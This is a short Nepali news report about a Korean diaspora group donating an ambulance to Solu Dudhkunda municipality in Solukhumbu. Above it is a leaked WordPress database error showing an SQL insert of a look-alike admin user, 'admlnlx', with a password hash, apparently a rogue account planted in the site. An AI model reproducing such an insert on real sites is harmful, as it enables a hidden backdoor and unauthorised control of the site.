WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWturabCDaz8HIcMoafzhJJ0WStqA60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 02:51:30', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १४ बैशाख, सोलुखुम्बु । सोलुखुम्बु सेवा समाज दक्षिण कोरियाद्वारा सोलु दुधकुन्ड नगरपालिकालाई एम्बुलेनस हस्तान्तरण गरेका छन ।
जिल्ला समान्वय समिती सोलुखुम्बुको प्रङगनमा भएको कार्यक्रममा सोलु दुधकुन्ड नगरपालिका प्रमुख नाम्गले शेर्पालाई एम्बुलेन्सको साचो हस्तान्तरण गरिएको हो ।
सोलु दुधकुन्ड नगरपालिका स्थित फाप्लु हस्पिटलमा सचालन हुने र सम्पूर्ण ब्याबस्थापन सोलुदुधकुन्ड नगरपालिकाले गर्ने गरी उक्त्त एम्बुलेन्स हस्तानतरण गरिएको सोलुखुम्बु सेवा समाज दक्षिण कोरियाका नि.बर्तमान अध्यक्ष तुलामान (टि.आर.) खालिङले बताए ।
सोलुखुम्बु सेवा समाज दक्षिण कोरियाले २०१८ फेब्रुवारी १५ मा एम्बुलेन्स खरिदको लागि एभरेष्ट म्युजिक कार्यक्रम सम्पन्न गरेको थियो ।
